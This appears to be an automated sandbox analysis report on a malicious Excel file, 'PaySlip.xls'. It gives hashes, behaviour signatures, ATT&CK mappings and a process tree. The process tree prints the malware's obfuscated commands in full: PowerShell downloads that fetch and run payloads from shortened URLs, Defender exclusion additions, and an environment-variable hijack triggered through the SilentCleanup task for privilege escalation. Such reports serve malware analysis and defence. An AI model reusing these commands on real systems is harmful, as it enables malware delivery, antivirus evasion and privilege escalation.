3f97ea67ea560c851c589e4b7161f60ece5c390a9e194818b30987b212434c06

General

Target

PaySlip.xls
Size

157KB
MD5

3202c4586c4991c9f5312238f7577d8e
SHA1

10291ff94dbce8eda7aa9ede69bf984a084b8b9e
SHA256

3f97ea67ea560c851c589e4b7161f60ece5c390a9e194818b30987b212434c06
SHA512

ebe2a28ac003935a61b9795b39aa34324d275aed8340263d9566b6068cbe813e979f28b6243d9115bbd2d23988a161129675aaa33281b855399b15ffb4aa1691

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cutt.ly/fjYtydH

Signatures

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exepowershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	3200	4716	cmd.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	416	4716	powershell.exe	EXCEL.EXE

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

15 4020 powershell.exe
17 4020 powershell.exe

flow	pid	process
15	4020	powershell.exe
17	4020	powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

1412 timeout.exe

pid	process
1412	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

4716 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exe

pid process

4020 powershell.exe
4020 powershell.exe
4020 powershell.exe
416 powershell.exe
416 powershell.exe
416 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 4020 powershell.exe
Token: SeDebugPrivilege 416 powershell.exe
Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

EXCEL.EXE

pid process

4716 EXCEL.EXE
4716 EXCEL.EXE

pid	process
4020	powershell.exe
4020	powershell.exe
4020	powershell.exe
416	powershell.exe
416	powershell.exe
416	powershell.exe

description	pid	process
Token: SeDebugPrivilege	4020	powershell.exe
Token: SeDebugPrivilege	416	powershell.exe

Suspicious use of SetWindowsHookEx 14 IoCs

Processes:

EXCEL.EXE

pid	process
4716	EXCEL.EXE
4716	EXCEL.EXE
4716	EXCEL.EXE
4716	EXCEL.EXE
4716	EXCEL.EXE
4716	EXCEL.EXE
4716	EXCEL.EXE
4716	EXCEL.EXE
4716	EXCEL.EXE
4716	EXCEL.EXE
4716	EXCEL.EXE
4716	EXCEL.EXE
4716	EXCEL.EXE
4716	EXCEL.EXE

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

EXCEL.EXEcmd.exepowershell.execmd.exe

description	pid	process	target process
PID 4716 wrote to memory of 3200	4716	EXCEL.EXE	cmd.exe
PID 4716 wrote to memory of 3200	4716	EXCEL.EXE	cmd.exe
PID 3200 wrote to memory of 4020	3200	cmd.exe	powershell.exe
PID 3200 wrote to memory of 4020	3200	cmd.exe	powershell.exe
PID 4716 wrote to memory of 416	4716	EXCEL.EXE	powershell.exe
PID 4716 wrote to memory of 416	4716	EXCEL.EXE	powershell.exe
PID 416 wrote to memory of 1084	416	powershell.exe	cmd.exe
PID 416 wrote to memory of 1084	416	powershell.exe	cmd.exe
PID 1084 wrote to memory of 1260	1084	cmd.exe	cmd.exe
PID 1084 wrote to memory of 1260	1084	cmd.exe	cmd.exe
PID 1084 wrote to memory of 1276	1084	cmd.exe	reg.exe
PID 1084 wrote to memory of 1276	1084	cmd.exe	reg.exe
PID 1084 wrote to memory of 1412	1084	cmd.exe	timeout.exe
PID 1084 wrote to memory of 1412	1084	cmd.exe	timeout.exe
PID 1084 wrote to memory of 1780	1084	cmd.exe	schtasks.exe
PID 1084 wrote to memory of 1780	1084	cmd.exe	schtasks.exe
PID 1084 wrote to memory of 1796	1084	cmd.exe	reg.exe
PID 1084 wrote to memory of 1796	1084	cmd.exe	reg.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\PaySlip.xls"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4716

C:\Windows\SYSTEM32\cmd.exe
cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebCL`I`eNT).('Down'+'loadFile').Invoke('https://cutt.ly/fjYtydH','a.bat')
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3200

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w 1 (nEw-oB`jecT Net.WebCL`I`eNT).('Down'+'loadFile').Invoke('https://cutt.ly/fjYtydH','a.bat')
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4020

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w 1 ./a.bat
2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:416

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Documents\a.bat""
3⤵
- Suspicious use of WriteProcessMemory
PID:1084

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ver
4⤵
PID:1260

C:\Windows\system32\reg.exe
reg add "HKCU\Environment" /v "windir" /d "cmd /c start p^owersh^el^l -w 1 Add-MpPreference -ExclusionPath "C:\tmp" ;Add-MpPreference -ExclusionPath "${EN`V`:APPdAta}" ;sTAR`T-sl`EeP 12;(nEw-oBje`cT Net.WebcL`IENt).('Down'+'load'+'Fi'+'le').InVoke('https://rebrand.ly/g8zrqvw',(${EN`V`:Appdata})+'\ok.exe');sTAR`T-sl`EeP 2; sTAR`T-pr`OCeSs ${EN`V`:Appdata}\ok.exe;
4⤵
PID:1276

C:\Windows\system32\timeout.exe
timeout /t 2
4⤵
- Delays execution with timeout.exe
PID:1412

C:\Windows\system32\schtasks.exe
schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
4⤵
PID:1780

C:\Windows\system32\reg.exe
reg delete "HKCU\Environment" /v "windir" /F
4⤵
PID:1796

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
d737fc27bbf2f3bd19d1706af83dbe3f

SHA1
212d219394124968b50769c371121a577d973985

SHA256
b96b55a2acd9c790092e8132b31e5f0110492f98828098112d46f2f9faa2b982

SHA512
974c2db081dd6d1f45763371c41e01173b189ea1a2d893d0bc415670bfa12f3934ba9dea64018b8c063017454d4d92888d6fe6eaad1659e420ba9adcde5e788b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
301f063ad8ef9768498205915a60cabd

SHA1
1b6b8402bd0c366a5a5554d86b9cdf82801a2d75

SHA256
8b9127dd3d256d85f31eaee48353b23522ab17c01329061a20ed51f857c5dc78

SHA512
41eafc53398f2ebbf42de9657c7aa81bed493c0b7a0280df20e6b2183f4deb2a225c826cddebe9f38c191c7fc7473253ae8807cc3a1144a2af4ac5b0d135ea18

Download Submit
C:\Users\Admin\Documents\a.bat
MD5
965010cb341dbea5a9d3ed6fca91740a

SHA1
3744f2b72dd21413565acc5e13ca5c82e1962fc6

SHA256
086a9ec8f6e4d536329e899ac34204e6f364dc496c4b1ddf1b5e964d342b915b

SHA512
99a55fbd54dc9f3479c70051d9839f1c04ec9b738ba7c29cecb36af8fa1203edf58bd8194044c4f68da3172dafc710a8ab8649cc6987fbdba018b211c0379519

Download Submit
C:\Users\Admin\Documents\a.bat
MD5
965010cb341dbea5a9d3ed6fca91740a

SHA1
3744f2b72dd21413565acc5e13ca5c82e1962fc6

SHA256
086a9ec8f6e4d536329e899ac34204e6f364dc496c4b1ddf1b5e964d342b915b

SHA512
99a55fbd54dc9f3479c70051d9839f1c04ec9b738ba7c29cecb36af8fa1203edf58bd8194044c4f68da3172dafc710a8ab8649cc6987fbdba018b211c0379519

Download Submit
memory/416-31-0x000001F5798D6000-0x000001F5798D8000-memory.dmp

Filesize
8KB

Download
memory/416-28-0x000001F5798D3000-0x000001F5798D5000-memory.dmp

Filesize
8KB

Download
memory/416-27-0x000001F5798D0000-0x000001F5798D2000-memory.dmp

Filesize
8KB

Download
memory/416-18-0x00007FF85AB20000-0x00007FF85B50C000-memory.dmp

Filesize
9.9MB

Download
memory/416-16-0x0000000000000000-mapping.dmp

Download
memory/1084-22-0x0000000000000000-mapping.dmp

Download
memory/1260-24-0x0000000000000000-mapping.dmp

Download
memory/1276-25-0x0000000000000000-mapping.dmp

Download
memory/1412-26-0x0000000000000000-mapping.dmp

Download
memory/1780-29-0x0000000000000000-mapping.dmp

Download
memory/1796-30-0x0000000000000000-mapping.dmp

Download
memory/3200-7-0x0000000000000000-mapping.dmp

Download
memory/4020-13-0x0000018A7F960000-0x0000018A7F961000-memory.dmp

Filesize
4KB

Download
memory/4020-12-0x0000018A7F6D3000-0x0000018A7F6D5000-memory.dmp

Filesize
8KB

Download
memory/4020-11-0x0000018A7F6D0000-0x0000018A7F6D2000-memory.dmp

Filesize
8KB

Download
memory/4020-10-0x0000018A7F5D0000-0x0000018A7F5D1000-memory.dmp

Filesize
4KB

Download
memory/4020-9-0x00007FF85AB20000-0x00007FF85B50C000-memory.dmp

Filesize
9.9MB

Download
memory/4020-8-0x0000000000000000-mapping.dmp

Download
memory/4020-14-0x0000018A7F6D6000-0x0000018A7F6D8000-memory.dmp

Filesize
8KB

Download
memory/4716-6-0x00007FF83FDE0000-0x00007FF83FDF0000-memory.dmp

Filesize
64KB

Download
memory/4716-4-0x00007FF83FDE0000-0x00007FF83FDF0000-memory.dmp

Filesize
64KB

Download
memory/4716-5-0x00007FF8640E0000-0x00007FF864717000-memory.dmp

Filesize
6.2MB

Download
memory/4716-2-0x00007FF83FDE0000-0x00007FF83FDF0000-memory.dmp

Filesize
64KB

Download
memory/4716-3-0x00007FF83FDE0000-0x00007FF83FDF0000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads